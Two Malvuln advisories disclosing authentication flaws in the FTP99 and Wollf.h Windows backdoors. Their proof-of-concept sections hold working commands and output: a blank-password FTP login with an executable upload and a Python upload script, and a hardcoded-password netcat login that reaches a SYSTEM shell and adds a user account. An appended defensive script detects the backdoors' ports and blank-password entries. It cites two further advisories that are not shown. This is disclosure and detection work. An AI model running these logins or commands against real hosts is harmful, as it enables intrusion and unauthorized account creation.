<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP99<br />Vulnerability: Authentication Bypass Race Condition<br />Description: The malware listens on TCP port 1492. Credentials are stored in cleartext in "Serv-u.ini" file under "C:\Program Files (x86)\My Paquet archive" with a blank password. Third-party attackers who can reach the system before a password has been set can logon by just supplying the username "HACKCITY".<br /><br />"Serv-u.ini"<br /><br />[USER=hackcity]<br />Password=<br />HomeDir=c:\<br />AlwaysAllowLogin=YES<br /><br />Type: PE32<br />MD5: 09dd14d3988e08a56798b1480c55a5b0<br />Vuln ID: MVID-2022-0465<br />Dropped files: Windll16.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />telnet.exe x.x.x.x 1492<br />220-Serv-U FTP-Server v2.3b for WinSock ready...<br />220 0wn3d<br />230 User HACKCITY logged in <br />HELP <br />214- The following commands are recognized (* => unimplemented). <br />USER PORT RETR ALLO DELE SITE XMKD CDUP <br />PASS PASV STOR REST CWD STAT RMD XCUP <br />ACCT TYPE APPE RNFR XCWD HELP XRMD STOU <br />REIN STRU SMNT RNTO LIST NOOP PWD SIZE <br />QUIT MODE SYST ABOR NLST MKD XPWD MDTM <br />214 Serv-U, registered to: Data Case <br />SYST <br />215 UNIX Type: L8 <br />PASV <br />227 Entering Passive Mode (192,168,18,129,206,190) <br />STOR DOOM.exe <br />150 Opening ASCII mode data connection for DOOM.exe. 
<br />STOR DOOM.exe <br />226 Transfer complete - file DOOM.exe received successfully<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.129"<br />PORT=52926  # data port announced in the PASV reply above (206*256+190)<br />DOOM="DOOM.exe"<br /><br />def doit():<br />    # connect to the passive-mode data port and stream the file in chunks<br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    with open(DOOM, "rb") as f:<br />        EXE = f.read(4096)<br />        while EXE:<br />            s.sendall(EXE)<br />            EXE = f.read(4096)<br /><br />    s.close()<br /><br />    print("By Malvuln")<br /><br />if __name__=="__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/5494b78dcfaf16aa43b5dbd563dc5582.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.h<br />Vulnerability: Hardcoded Cleartext Password <br />Description: The malware listens on TCP port 7300 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "grish5800" is hardcoded within the executable. The malware is packed with UPX and exposes the cleartext credentials when decompressed.<br />Type: PE32<br />MD5: 5494b78dcfaf16aa43b5dbd563dc5582<br />Vuln ID: MVID-2021-0405<br />Dropped files: asphelp.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 7300<br /><br />login: grish5800<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#DOS<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS\system32>whoami<br />whoami<br />nt authority\system<br /><br />C:\WINDOWS\system32>net user MALVULN 666 /add<br />net user MALVULN 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
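Host-side triage for the listening backdoors the Malvuln advisories on this page describe (Hanuman.b on TCP 3333, Agent.ad on 87, FTP99 on 1492, Wollf.h on 7300), plus the blank-password check for the Serv-U style ini file the FTP99 advisory quotes. This is an added example, not Malvuln's code; the netstat output and ini text are constructed samples, and on a real host you would feed it the output of `netstat -ano` and the contents of the ini file the advisory names.

```python
import re
from typing import Dict, List

# TCP listener -> threat, taken from the Malvuln advisories above.
BACKDOOR_PORTS: Dict[int, str] = {
    3333: "Backdoor.Win32.Hanuman.b (MVID-2022-0467)",
    87: "Backdoor.Win32.Agent.ad (MVID-2021-0406)",
    1492: "Backdoor.Win32.FTP99 (MVID-2022-0465, MVID-2022-0466)",
    7300: "Backdoor.Win32.Wollf.h (MVID-2021-0405)",
}

# One "netstat -ano" row in LISTENING state: local addr:port ... PID
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

# Constructed sample of "netstat -ano" output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:1492           0.0.0.0:0              LISTENING       4120
  TCP    0.0.0.0:7300           0.0.0.0:0              LISTENING       5016
  TCP    192.168.18.129:49700   192.168.18.5:445       ESTABLISHED     4
  UDP    0.0.0.0:5353           *:*                                    1388
"""

# Constructed sample in the Serv-U.ini layout the FTP99 advisory quotes.
SAMPLE_INI = """\
[GLOBAL]
Version=2.3b

[USER=hackcity]
Password=
HomeDir=c:\\
AlwaysAllowLogin=YES

[USER=backup]
Password=xx0123abcdef
HomeDir=c:\\ftp
"""


def suspicious_listeners(netstat_output: str) -> List[dict]:
    """Return LISTENING TCP sockets whose port matches an advisory on this page."""
    hits = []
    for line in netstat_output.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        local_addr, port, pid = m.group(1), int(m.group(2)), int(m.group(3))
        if port in BACKDOOR_PORTS:
            hits.append({"port": port, "pid": pid, "addr": local_addr,
                         "threat": BACKDOOR_PORTS[port]})
    return hits


def blank_password_accounts(ini_text: str) -> List[dict]:
    """Parse [USER=...] sections and return those whose Password value is empty."""
    accounts: List[dict] = []
    current = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            # A new section: only [USER=name] sections are of interest.
            if line.startswith("[USER=") and line.endswith("]"):
                current = {"user": line[6:-1], "password": None,
                           "always_allow": False, "homedir": None}
                accounts.append(current)
            else:
                current = None
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key == "password":
            current["password"] = value
        elif key == "alwaysallowlogin":
            current["always_allow"] = value.upper() == "YES"
        elif key == "homedir":
            current["homedir"] = value
    return [a for a in accounts if a["password"] == ""]


if __name__ == "__main__":
    for hit in suspicious_listeners(SAMPLE_NETSTAT):
        print(f"port {hit['port']} (PID {hit['pid']}): {hit['threat']}")
    for acct in blank_password_accounts(SAMPLE_INI):
        print(f"blank password for FTP user {acct['user']!r}, "
              f"AlwaysAllowLogin={acct['always_allow']}")
```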